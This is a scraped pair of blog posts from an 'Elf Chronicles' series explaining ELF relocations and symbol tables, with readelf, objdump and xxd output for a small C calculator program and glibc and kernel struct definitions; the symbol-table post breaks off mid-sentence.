Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 9 ] Name: mulFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 10 ] Name: divFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 11 ] Name: puts Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 12 ] Name: __stack_chk_fail Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 Just focus on the symbol for our case\u0026hellip; index 3.\n[ 3 ] Name: /* No name for symbol */ Info: 0x03 (Bind: 0x0 | Type: 0x3) /* Bind: STB_LOCAL | Type: STT_SECTION */ Other: 0x0 /* default 
visibility */ Shndx: 0x5 /* section 5; .rodata in our case */ Value: 0x000000000000 /* no value; I wonder what could be the value for \u0026#34;STT_SECTION\u0026#34; type symbol */ Size: 0x0 /* Unknown size */ Putting all the pieces together, it\u0026rsquo;s crystal clear now that this symbol is casually pointing towards the .rodata section. Picture this section as a treasure trove of read-only data. An example? Think of it like a collection of strings that printf and its buddies use to sprinkle some magic onto your screen. It\u0026rsquo;s like the VIP lounge for data that\u0026rsquo;s there to be seen but not messed with.\nLooking back at our relocation entry, we can now understand it better\n[ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 Apply relocation at offset 0x1a in .text section. Use symbol 3 for relocation\u0026hellip; that points to .rodata section. Relocation algorithm will be R_X86_64_PC32 (S + A - P) Tools like readelf and objdump can show you relocation entries with all of this already decoded. (readelf prints the addend in hex, so the + 15 below is the 21 my parser printed.)\n❯ readelf --relocs --wide calc/main.o Relocation section \u0026#39;.rela.text\u0026#39; at offset 0x3e0 contains 13 entries: Offset Info Type Symbol\u0026#39;s Value Symbol\u0026#39;s Name + Addend 000000000000001a 0000000300000002 R_X86_64_PC32 0000000000000000 .rodata - 4 0000000000000027 0000000500000004 R_X86_64_PLT32 0000000000000000 printf - 4 000000000000003d 0000000300000002 R_X86_64_PC32 0000000000000000 .rodata + 15 000000000000004a 0000000600000004 R_X86_64_PLT32 0000000000000000 __isoc99_scanf - 4 0000000000000087 0000000700000004 R_X86_64_PLT32 0000000000000000 addFunc - 4 00000000000000a4 0000000800000004 R_X86_64_PLT32 0000000000000000 subFunc - 4 00000000000000c1 0000000900000004 R_X86_64_PLT32 0000000000000000 mulFunc - 4 00000000000000de 0000000a00000004 R_X86_64_PLT32 0000000000000000 divFunc - 4 00000000000000ee 0000000300000002 R_X86_64_PC32 0000000000000000 .rodata + 1e 00000000000000f6
0000000b00000004 R_X86_64_PLT32 0000000000000000 puts - 4 0000000000000117 0000000300000002 R_X86_64_PC32 0000000000000000 .rodata + 2f 0000000000000124 0000000500000004 R_X86_64_PLT32 0000000000000000 printf - 4 000000000000013d 0000000c00000004 R_X86_64_PLT32 0000000000000000 __stack_chk_fail - 4 ❯ objdump -M intel -dr calc/main.o calc/main.o: file format elf64-x86-64 Disassembly of section .text: 0000000000000000 \u0026lt;main\u0026gt;: 0: 55 push rbp 1: 48 89 e5 mov rbp,rsp 4: 48 83 ec 20 sub rsp,0x20 8: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28 f: 00 00 11: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax 15: 31 c0 xor eax,eax 17: 48 8d 05 00 00 00 00 lea rax,[rip+0x0] # 1e \u0026lt;main+0x1e\u0026gt; 1a: R_X86_64_PC32 .rodata-0x4 1e: 48 89 c7 mov rdi,rax 21: b8 00 00 00 00 mov eax,0x0 26: e8 00 00 00 00 call 2b \u0026lt;main+0x2b\u0026gt; 27: R_X86_64_PLT32 printf-0x4 2b: 48 8d 4d f0 lea rcx,[rbp-0x10] 2f: 48 8d 55 eb lea rdx,[rbp-0x15] 33: 48 8d 45 ec lea rax,[rbp-0x14] 37: 48 89 c6 mov rsi,rax 3a: 48 8d 05 00 00 00 00 lea rax,[rip+0x0] # 41 \u0026lt;main+0x41\u0026gt; 3d: R_X86_64_PC32 .rodata+0x15 41: 48 89 c7 mov rdi,rax 44: b8 00 00 00 00 mov eax,0x0 49: e8 00 00 00 00 call 4e \u0026lt;main+0x4e\u0026gt; 4a: R_X86_64_PLT32 __isoc99_scanf-0x4 4e: 0f b6 45 eb movzx eax,BYTE PTR [rbp-0x15] 52: 0f be c0 movsx eax,al 55: 83 f8 2f cmp eax,0x2f 58: 74 74 je ce \u0026lt;main+0xce\u0026gt; 5a: 83 f8 2f cmp eax,0x2f 5d: 0f 8f 88 00 00 00 jg eb \u0026lt;main+0xeb\u0026gt; 63: 83 f8 2d cmp eax,0x2d 66: 74 2c je 94 \u0026lt;main+0x94\u0026gt; 68: 83 f8 2d cmp eax,0x2d 6b: 7f 7e jg eb \u0026lt;main+0xeb\u0026gt; 6d: 83 f8 2a cmp eax,0x2a 70: 74 3f je b1 \u0026lt;main+0xb1\u0026gt; 72: 83 f8 2b cmp eax,0x2b 75: 75 74 jne eb \u0026lt;main+0xeb\u0026gt; 77: f3 0f 10 45 f0 movss xmm0,DWORD PTR [rbp-0x10] 7c: 8b 45 ec mov eax,DWORD PTR [rbp-0x14] 7f: 0f 28 c8 movaps xmm1,xmm0 82: 66 0f 6e c0 movd xmm0,eax 86: e8 00 00 00 00 call 8b \u0026lt;main+0x8b\u0026gt; 87: 
R_X86_64_PLT32 addFunc-0x4 8b: 66 0f 7e c0 movd eax,xmm0 8f: 89 45 f4 mov DWORD PTR [rbp-0xc],eax 92: eb 6d jmp 101 \u0026lt;main+0x101\u0026gt; 94: f3 0f 10 45 f0 movss xmm0,DWORD PTR [rbp-0x10] 99: 8b 45 ec mov eax,DWORD PTR [rbp-0x14] 9c: 0f 28 c8 movaps xmm1,xmm0 9f: 66 0f 6e c0 movd xmm0,eax a3: e8 00 00 00 00 call a8 \u0026lt;main+0xa8\u0026gt; a4: R_X86_64_PLT32 subFunc-0x4 a8: 66 0f 7e c0 movd eax,xmm0 ac: 89 45 f4 mov DWORD PTR [rbp-0xc],eax af: eb 50 jmp 101 \u0026lt;main+0x101\u0026gt; b1: f3 0f 10 45 f0 movss xmm0,DWORD PTR [rbp-0x10] b6: 8b 45 ec mov eax,DWORD PTR [rbp-0x14] b9: 0f 28 c8 movaps xmm1,xmm0 bc: 66 0f 6e c0 movd xmm0,eax c0: e8 00 00 00 00 call c5 \u0026lt;main+0xc5\u0026gt; c1: R_X86_64_PLT32 mulFunc-0x4 c5: 66 0f 7e c0 movd eax,xmm0 c9: 89 45 f4 mov DWORD PTR [rbp-0xc],eax cc: eb 33 jmp 101 \u0026lt;main+0x101\u0026gt; ce: f3 0f 10 45 f0 movss xmm0,DWORD PTR [rbp-0x10] d3: 8b 45 ec mov eax,DWORD PTR [rbp-0x14] d6: 0f 28 c8 movaps xmm1,xmm0 d9: 66 0f 6e c0 movd xmm0,eax dd: e8 00 00 00 00 call e2 \u0026lt;main+0xe2\u0026gt; de: R_X86_64_PLT32 divFunc-0x4 e2: 66 0f 7e c0 movd eax,xmm0 e6: 89 45 f4 mov DWORD PTR [rbp-0xc],eax e9: eb 16 jmp 101 \u0026lt;main+0x101\u0026gt; eb: 48 8d 05 00 00 00 00 lea rax,[rip+0x0] # f2 \u0026lt;main+0xf2\u0026gt; ee: R_X86_64_PC32 .rodata+0x1e f2: 48 89 c7 mov rdi,rax f5: e8 00 00 00 00 call fa \u0026lt;main+0xfa\u0026gt; f6: R_X86_64_PLT32 puts-0x4 fa: b8 01 00 00 00 mov eax,0x1 ff: eb 2c jmp 12d \u0026lt;main+0x12d\u0026gt; 101: 66 0f ef d2 pxor xmm2,xmm2 105: f3 0f 5a 55 f4 cvtss2sd xmm2,DWORD PTR [rbp-0xc] 10a: 66 48 0f 7e d0 movq rax,xmm2 10f: 66 48 0f 6e c0 movq xmm0,rax 114: 48 8d 05 00 00 00 00 lea rax,[rip+0x0] # 11b \u0026lt;main+0x11b\u0026gt; 117: R_X86_64_PC32 .rodata+0x2f 11b: 48 89 c7 mov rdi,rax 11e: b8 01 00 00 00 mov eax,0x1 123: e8 00 00 00 00 call 128 \u0026lt;main+0x128\u0026gt; 124: R_X86_64_PLT32 printf-0x4 128: b8 00 00 00 00 mov eax,0x0 12d: 48 8b 55 f8 mov rdx,QWORD PTR [rbp-0x8] 
131: 64 48 2b 14 25 28 00 sub rdx,QWORD PTR fs:0x28 138: 00 00 13a: 74 05 je 141 \u0026lt;main+0x141\u0026gt; 13c: e8 00 00 00 00 call 141 \u0026lt;main+0x141\u0026gt; 13d: R_X86_64_PLT32 __stack_chk_fail-0x4 141: c9 leave 142: c3 ret Conclusion Throughout this article, we explored the significance of relocations in ELF binaries, examining how compilers, assemblers, and linkers collaborate to produce executable files. We delved into the role of relocation sections, uncovering their purpose in accommodating changes to addresses and offsets during both compile-time and link-time.\nSince symbols and relocations combined are a huge topic in themselves, I\u0026rsquo;m adding a few links that I think are interesting and will help you grasp the whole concept in practice\n@xianeizhang\u0026rsquo;s notes (https://people.cs.pitt.edu/~xianeizhang/notes/Linking.html)\nUnderstanding the ELF specimen (https://hub.packtpub.com/understanding-elf-specimen/)\nCloudflare blogs on \u0026ldquo;How to execute an object file\u0026rdquo; - part 1 and part 2\nAn amazing talk by @Anders Schau Knatten on \u0026ldquo;How symbols work and why we need them\u0026rdquo; (youtube)\nSee you next time.\n","permalink":"https://ayedaemon.github.io/post/2023/12/elf-chronicles-relocations/","summary":"In previous article about Symbol Tables, we talked about the below diagram \u0026hellip;.\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.o │ │ main.","title":"Elf Chronicles: Relocations (6/?)"},{"content":"\u0026hellip; prologue At this point I hope you have a general idea of how a C program goes through multiple stages/passes and finally an ELF file is generated. 
Below is a diagram to jog your memory on this\n┌──────────────────┐ │ │ │ hello.c │ // C source │ │ └────────┬─────────┘ │ │ │ /* Compile */ │ │ │ ▼ ┌──────────────────┐ │ │ │ hello.s │ // assembler source │ │ └────────┬─────────┘ │ │ │ /* assemble */ │ │ ▼ ┌──────────────────┐ │ │ │ hello.o │ // Assembled program (ELF - relocatable) │ │ └────────┬─────────┘ │ │ │ /* link */ │ │ ▼ ┌──────────────────┐ │ │ │ hello │ // Executable binary (ELF - executable) │ │ └──────────────────┘ Creating a simple hello program is very straight-forward, let me show you how this flow works when we are building something that has more than 1 source file. This is generally what most of the \u0026ldquo;real-world\u0026rdquo; projects do, they create multiple files with different functionalities and then merge them together to complete the program with the desired features only.\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.o │ │ main.o │ │ │ │ │ └─────────┬───────────┘ └──────────┬─────────┘ │ │ │ │ │ │ │ │ │ /* Linking Magic */ │ └───────────────────────────────────┬──────────────────────────────────────┘ │ │ │ │ │ │ ▼ ┌────────────────┐ │ │ │ calc │ │ │ └────────────────┘ /* File: libarithmatic.c */ float addFunc (float a, float b) { return a + b; } float subFunc (float a, float b) { return a - b; } float mulFunc (float a, float b) { return a * b; } float divFunc (float a, float b) { if (b == 0) { return 0.0; } return a / b; } /* File: libarithmatic.h */ #ifndef ARITHMATIC_H #define ARITHMATIC_H float addFunc (float, float); float subFunc (float, float); float mulFunc (float, float); float divFunc (float, float); float magicFunc (float a, float b); #endif /* File: main.c */ 
#include \u0026lt;stdio.h\u0026gt; #include \u0026#34;libarithmatic.h\u0026#34; int main() { float num1, num2, result; char operator; printf(\u0026#34;Enter equation (9 * 6): \u0026#34;); scanf(\u0026#34;%f %c %f\u0026#34;, \u0026amp;num1, \u0026amp;operator, \u0026amp;num2); switch (operator) { case \u0026#39;+\u0026#39;: result = addFunc(num1, num2); break; case \u0026#39;-\u0026#39;: result = subFunc(num1, num2); break; case \u0026#39;*\u0026#39;: result = mulFunc(num1, num2); break; case \u0026#39;/\u0026#39;: result = divFunc(num1, num2); break; default: printf(\u0026#34;Invalid operator\\n\u0026#34;); return 1; } printf(\u0026#34;Result: %.2f\\n\u0026#34;, result); return 0; } Luckily gcc provides some features, that helps us to make this process easier.\n❯ gcc --help Usage: gcc [options] file... Options: \u0026lt;... OMITTED ...\u0026gt; -E Preprocess only; do not compile, assemble or link. -S Compile only; do not assemble or link. -c Compile and assemble, but do not link. So if you follow these commands, you’ll be fine\n# Compile + assemble -\u0026gt; generates main.o gcc -c main.c # Compile + assemble -\u0026gt; generates libarithmatic.o gcc -c libarithmatic.c # Linking -\u0026gt; generates calc gcc main.o libarithmatic.o -o calc This is our first time so far writing multiple files for a program. So let\u0026rsquo;s take a moment to understand how this works.\nFirst, we create a libarithmatic.c file with all of the required arithmatic functions - addFunc, subFunc, mulFunc, and divFunc. Since this file contains these functions (function definitions), the intermediate object file for this file will have related information as well.\nThen comes the main.c file, where we have declared the main function. Inside the main function, we have used arithmatic functions which are not defined in this file. 
Calling them without any declaration would make the compiler complain, so as a promise we give declarations stating that these functions exist somewhere and will be found by the linker in a later step. Here those declarations live in the libarithmatic.h file \u0026ndash; the header file for libarithmatic.c.\nSo when we compile libarithmatic.c, we get a libarithmatic.o file that contains the 4 arithmetic functions as defined. On the other hand, main.c generates a main.o file whose main function tries to call the arithmetic functions - addFunc, subFunc, mulFunc, and divFunc.\nQuestion - How does main.o call these functions when their addresses are not known to the compiler??\nAnswer - The compiler takes main.c and libarithmatic.h (a promise that these will be present when linking), and then generates main.o with all of the call instructions\u0026hellip; but because it does not know the addresses of the functions being called, the address fields are left blank. 
These blanks will be filled in by the linker during the relocation process.\nHere is proof that all of them are empty (zeroed) before linking and have their addresses fixed up after linking\n## Before linking - main.o ❯ objdump -M intel -D -j .text main.o | grep call 26: e8 00 00 00 00 call 2b \u0026lt;main+0x2b\u0026gt; 49: e8 00 00 00 00 call 4e \u0026lt;main+0x4e\u0026gt; 86: e8 00 00 00 00 call 8b \u0026lt;main+0x8b\u0026gt; a3: e8 00 00 00 00 call a8 \u0026lt;main+0xa8\u0026gt; c0: e8 00 00 00 00 call c5 \u0026lt;main+0xc5\u0026gt; dd: e8 00 00 00 00 call e2 \u0026lt;main+0xe2\u0026gt; f5: e8 00 00 00 00 call fa \u0026lt;main+0xfa\u0026gt; 123: e8 00 00 00 00 call 128 \u0026lt;main+0x128\u0026gt; 13c: e8 00 00 00 00 call 141 \u0026lt;main+0x141\u0026gt; ## After linking - calc ❯ objdump -M intel -D -j .text calc | grep call 1138: e8 63 ff ff ff call 10a0 \u0026lt;_start+0x30\u0026gt; 118f: e8 bc fe ff ff call 1050 \u0026lt;printf@plt\u0026gt; 11b2: e8 a9 fe ff ff call 1060 \u0026lt;__isoc99_scanf@plt\u0026gt; 11ef: e8 b8 00 00 00 call 12ac \u0026lt;addFunc\u0026gt; 120c: e8 b5 00 00 00 call 12c6 \u0026lt;subFunc\u0026gt; 1229: e8 b2 00 00 00 call 12e0 \u0026lt;mulFunc\u0026gt; 1246: e8 af 00 00 00 call 12fa \u0026lt;divFunc\u0026gt; 125e: e8 cd fd ff ff call 1030 \u0026lt;puts@plt\u0026gt; 128c: e8 bf fd ff ff call 1050 \u0026lt;printf@plt\u0026gt; 12a5: e8 96 fd ff ff call 1040 \u0026lt;__stack_chk_fail@plt\u0026gt; Symbols and symbol tables Now the question is: how does the linker know which blanks to fill, and how to fill them?? \u0026hellip;this is where symbols and symbol tables come in.\nWhen writing a program, we often use \u0026ldquo;names\u0026rdquo; to reference \u0026ldquo;objects\u0026rdquo; in our code, like function \u0026ldquo;names\u0026rdquo; and variable \u0026ldquo;names\u0026rdquo;. These \u0026ldquo;names\u0026rdquo; are commonly referred to as symbols. (yeah, deal with it now!)\nKeep in mind that not all \u0026ldquo;names\u0026rdquo; are symbols. 
For example, an ordinary local variable of a function won\u0026rsquo;t be treated as a symbol. If you think it through, you don\u0026rsquo;t need the linker to handle that data, so what\u0026rsquo;s the point of adding that info as a symbol, right?\nAnother thing worth noting is that, unlike string tables, symbol tables have a well-defined structure, and both Glibc and the Linux kernel define a struct for this (Elf64_Sym for 64-bit files).\n/* Glibc https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l530 */ typedef struct { Elf64_Word st_name; /* Symbol name (string tbl index) */ unsigned char st_info; /* Symbol type and binding */ unsigned char st_other; /* Symbol visibility */ Elf64_Section st_shndx; /* Section index */ Elf64_Addr st_value; /* Symbol value */ Elf64_Xword st_size; /* Symbol size */ } Elf64_Sym; /* Linux kernel v6.5.8 https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L197 */ typedef struct elf64_sym { Elf64_Word st_name;\t/* Symbol name, index in string tbl */ unsigned char\tst_info;\t/* Type and binding attributes */ unsigned char\tst_other;\t/* No defined meaning, 0 */ Elf64_Half st_shndx;\t/* Associated section index */ Elf64_Addr st_value;\t/* Value of the symbol */ Elf64_Xword st_size;\t/* Associated symbol size */ } Elf64_Sym; Let\u0026rsquo;s see what each member of this struct represents\nst_name Similar to other name fields in the ELF specification, this member stores the index or offset in the associated string table.\nst_info This member represents a combined value derived from two different but related attributes: bind and type.\nBoth the Linux kernel and glibc provide definitions and macros to work with this member.\n1. 
Bind The \u0026ldquo;bind\u0026rdquo; bits provide information about where this symbol can be seen and used\u0026hellip; There are 3 kinds of binding defined by linux kernel\n/* https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L123 */ #define STB_LOCAL 0 /* not visible outside the object file */ #define STB_GLOBAL 1 /* visible to all object files */ #define STB_WEAK 2 /* like globals, but with lower precedence */ But glibc adds few more to this list\n/* https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l582 */ #define STB_LOCAL 0 /* Local symbol */ #define STB_GLOBAL 1 /* Global symbol */ #define STB_WEAK 2 /* Weak symbol */ #define STB_NUM 3 /* Number of defined types. */ #define STB_LOOS 10 /* Start of OS-specific */ #define STB_GNU_UNIQUE 10 /* Unique symbol. */ #define STB_HIOS 12 /* End of OS-specific */ #define STB_LOPROC 13 /* Start of processor-specific */ #define STB_HIPROC 15 /* End of processor-specific */ Kernel and glibc both provide a macro to extract the bind value from the provided st_info member - #define ELF_ST_BIND(x)\t((x) \u0026gt;\u0026gt; 4)\n2. Type type bits tells about the type of symbol - function, file, variable, etc. 
One could say \u0026ndash; A general classification for the symbol.\nLinux kernel defines total 7 types\n/* https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L128 */ #define STT_NOTYPE 0 /* Unspecified */ #define STT_OBJECT 1 /* data objects like variables, arrays, etc*/ #define STT_FUNC 2 /* functions or other executable codes*/ #define STT_SECTION 3 /* associated with a section; mainly used for relocations (we\u0026#39;ll see relocations in later articles)*/ #define STT_FILE 4 /* name of the source file*/ #define STT_COMMON 5 /* just like STT_OBJECT, but for tentative values */ #define STT_TLS 6 /* stores thread local data which is unique to each thread */ And again our beloved glibc expanded these definitions\n/* https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l595 */ #define STT_NOTYPE 0 /* Symbol type is unspecified */ #define STT_OBJECT 1 /* Symbol is a data object */ #define STT_FUNC 2 /* Symbol is a code object */ #define STT_SECTION 3 /* Symbol associated with a section */ #define STT_FILE 4 /* Symbol\u0026#39;s name is file name */ #define STT_COMMON 5 /* Symbol is a common data object */ #define STT_TLS 6 /* Symbol is thread-local data object*/ #define STT_NUM 7 /* Number of defined types. */ #define STT_LOOS 10 /* Start of OS-specific */ #define STT_GNU_IFUNC 10 /* Symbol is indirect code object */ #define STT_HIOS 12 /* End of OS-specific */ #define STT_LOPROC 13 /* Start of processor-specific */ #define STT_HIPROC 15 /* End of processor-specific */ Kernel and glibc both provide a macro to extract the type value from the provided st_info member - #define ELF_ST_TYPE(x) ((x) \u0026amp; 0xf)\nst_other If you examine the Elf64_Sym struct in both the kernel and Glibc source code, you\u0026rsquo;ll notice that the kernel doesn\u0026rsquo;t currently have any use case for this field and marks it as such. 
However, Glibc uses this field to track the visibility of the symbol.\n/* https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l626 */ #define STV_DEFAULT 0 /* Default symbol visibility rules - as specified by symbol binding*/ #define STV_INTERNAL 1 /* Processor specific hidden class */ #define STV_HIDDEN 2 /* Sym unavailable in other modules */ #define STV_PROTECTED 3 /* Not preemptible, not exported */ From what I understand, symbol visibility (yup, this is what glibc calls st_other) extends the concept of symbol binding and provides more control over symbol access.\nYou can read more about this member from here 1 and here 2.\nst_shndx This attribute indicates the section associated with this symbol. It holds the section index corresponding to the sections in the section header.\nst_value Indeed, each symbol should have both a name and an associated value. This member holds the value associated with the respective symbol.\nst_size Many symbols come with associated sizes, for function type symbols this will be the size of that function. If a symbol doesn\u0026rsquo;t have a size or its size is unknown, this member holds a value of zero.\nAnalysis Now that we have a foundational understanding, we can apply this knowledge to analyze our previous files.\n1. libarithmatic.o To keep things straightforward, I\u0026rsquo;ll begin by listing all the sections in the libarithmatic.o file. 
(This is the output from my parser, you can use hexdumps or any other parser of your choice\u0026hellip;)\n[ 00 ] Section Name: Type: 0x0 Flags: 0x0 Addr: 0x0 Offset: 0x0 Size: 0 Link: 0 Info: 0x0 Addralign: 0x0 Entsize: 0 [ 01 ] Section Name: .text Type: 0x1 Flags: 0x6 Addr: 0x0 Offset: 0x40 Size: 130 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 02 ] Section Name: .data Type: 0x1 Flags: 0x3 Addr: 0x0 Offset: 0xc2 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 03 ] Section Name: .bss Type: 0x8 Flags: 0x3 Addr: 0x0 Offset: 0xc2 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 04 ] Section Name: .comment Type: 0x1 Flags: 0x30 Addr: 0x0 Offset: 0xc2 Size: 28 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 1 [ 05 ] Section Name: .note.GNU-stack Type: 0x1 Flags: 0x0 Addr: 0x0 Offset: 0xde Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 06 ] Section Name: .note.gnu.property Type: 0x7 Flags: 0x2 Addr: 0x0 Offset: 0xe0 Size: 48 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 07 ] Section Name: .eh_frame Type: 0x1 Flags: 0x2 Addr: 0x0 Offset: 0x110 Size: 152 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 08 ] Section Name: .rela.eh_frame Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x288 Size: 96 Link: 9 Info: 0x7 Addralign: 0x8 Entsize: 24 [ 09 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x1a8 Size: 168 Link: 10 Info: 0x3 Addralign: 0x8 Entsize: 24 [ 10 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x250 Size: 49 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 11 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x2e8 Size: 103 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 Now we can easily filter out the symbol table from this (Type: 0x2)\n[ 09 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x1a8 Size: 168 Link: 10 Info: 0x3 Addralign: 0x8 Entsize: 24 If you go back and revisit the article about section headers and check the explaination about members, you\u0026rsquo;ll be able to conclude this 
\u0026ndash; .symtab section is linked to .strtab section. So the offset values from st_name of symbol table can be resolved to proper strings using this string table.\n┌─────────────────────────────────┐ │ │ │ [ 09 ] Section Name: .symtab │ │ Type: 0x2 │ │ Flags: 0x0 │ │ Addr: 0x0 │ │ Offset: 0x1a8 │ │ Size: 168 │ ┌────┼────────── Link: 10 │ │ │ Info: 0x3 │ │ │ Addralign: 0x8 │ │ │ Entsize: 24 │ │ │ │ │ │ │ │ └─────────────────────────────────┘ │ │ │ │ │ ┌─────────────────────────────────┐ │ │ │ └────┤► [ 10 ] Section Name: .strtab │ │ Type: 0x3 │ │ Flags: 0x0 │ │ Addr: 0x0 │ │ Offset: 0x250 │ │ Size: 49 │ │ Link: 0 │ │ Info: 0x0 │ │ Addralign: 0x1 │ │ Entsize: 0 │ │ │ │ │ └─────────────────────────────────┘ Now we can begin with the interesting stuff and the first step will be to pull out the .symtab section and parse it.\n############ Explaination ################# # # xxd # -s 0x1a8 # start point (Offset: 0x1a8) # -l 168 # total length (Size: 168) # -c 24 # bytes per line (Entsize: 24) - I wanted to get each entry in a single line for uniformity # libarithmatic.o # filename # | nl -v0 # line numbers starting from 0 # ############################################# ❯ xxd -s 0x1a8 -l 168 -c 24 libarithmatic.o | nl -v0 0 000001a8: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ........................ 1 000001c0: 0100 0000 0400 f1ff 0000 0000 0000 0000 0000 0000 0000 0000 ........................ 2 000001d8: 0000 0000 0300 0100 0000 0000 0000 0000 0000 0000 0000 0000 ........................ 3 000001f0: 1100 0000 1200 0100 0000 0000 0000 0000 1a00 0000 0000 0000 ........................ 4 00000208: 1900 0000 1200 0100 1a00 0000 0000 0000 1a00 0000 0000 0000 ........................ 5 00000220: 2100 0000 1200 0100 3400 0000 0000 0000 1a00 0000 0000 0000 !.......4............... 6 00000238: 2900 0000 1200 0100 4e00 0000 0000 0000 3400 0000 0000 0000 ).......N.......4....... 
If we parse this data using the struct Elf64_Sym, we\u0026rsquo;ll get something like this\ntypedef struct { +------------------------------Elf64_Word st_name; | | +---------------------unsigned char st_info; | | | | +---------------unsigned char st_other; | | | | | | +----------Elf64_Section st_shndx; | | | | | | | | Elf64_Addr st_value;----+ | | | | | | | | | Elf64_Xword st_size;-----+-----------------+ | | | | | | | | | | } Elf64_Sym; | | | | | | | | | | | | | | | | | +-------------------+ | | | | | | | | | | +------------------+ | | | | | | | | | | +-------------------+ | | | | | | | | | | +-------------------+ | | | | | | | | | | | v v v v v v Index | Offset | 0 | 000001a8:| 0000 0000 | 00 | 00 | 0000 | 0000 0000 0000 0000 | 0000 0000 0000 0000 | 1 | 000001c0:| 0100 0000 | 04 | 00 | f1ff | 0000 0000 0000 0000 | 0000 0000 0000 0000 | 2 | 000001d8:| 0000 0000 | 03 | 00 | 0100 | 0000 0000 0000 0000 | 0000 0000 0000 0000 | 3 | 000001f0:| 1100 0000 | 12 | 00 | 0100 | 0000 0000 0000 0000 | 1a00 0000 0000 0000 | 4 | 00000208:| 1900 0000 | 12 | 00 | 0100 | 1a00 0000 0000 0000 | 1a00 0000 0000 0000 | 5 | 00000220:| 2100 0000 | 12 | 00 | 0100 | 3400 0000 0000 0000 | 1a00 0000 0000 0000 | 6 | 00000238:| 2900 0000 | 12 | 00 | 0100 | 4e00 0000 0000 0000 | 3400 0000 0000 0000 | From my parser, I got this result\n[ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 1 ] Name: libarithmatic.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 2 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x0 [ 3 ] Name: addFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x1a [ 4 ] Name: subFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x00000000001a Size: 0x1a [ 5 ] Name: mulFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000034 Size: 0x1a [ 6 ] Name: divFunc 
Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x00000000004e Size: 0x34 For the sake of simplicity and the scope of this article, I\u0026rsquo;ll focus on discussing the four functions in this table and leave the rest for you to explore and learn.\nWe can observe that the st_info value for all of these symbols is the same, which implies that their \u0026ldquo;bind\u0026rdquo; and \u0026ldquo;type\u0026rdquo; values are identical (duhh). (The raw st_info byte in the hex dump is 0x12; the 0x18 shown in the parser output is that same value printed in decimal, 18, behind a 0x prefix.) According to the information we\u0026rsquo;ve gathered, these symbols are GLOBAL (bind=0x1) and of FUNC (type=0x2) type. This indicates that these symbols are basically global functions and can be called from other files as well.\nIt\u0026rsquo;s worth noting that there\u0026rsquo;s a very cool tool called \u0026quot;ftrace\u0026quot; by elfmaster, which utilizes this information to trace function calls, specifically focusing on function calls and not other symbols.\nFurthermore, the st_other field is 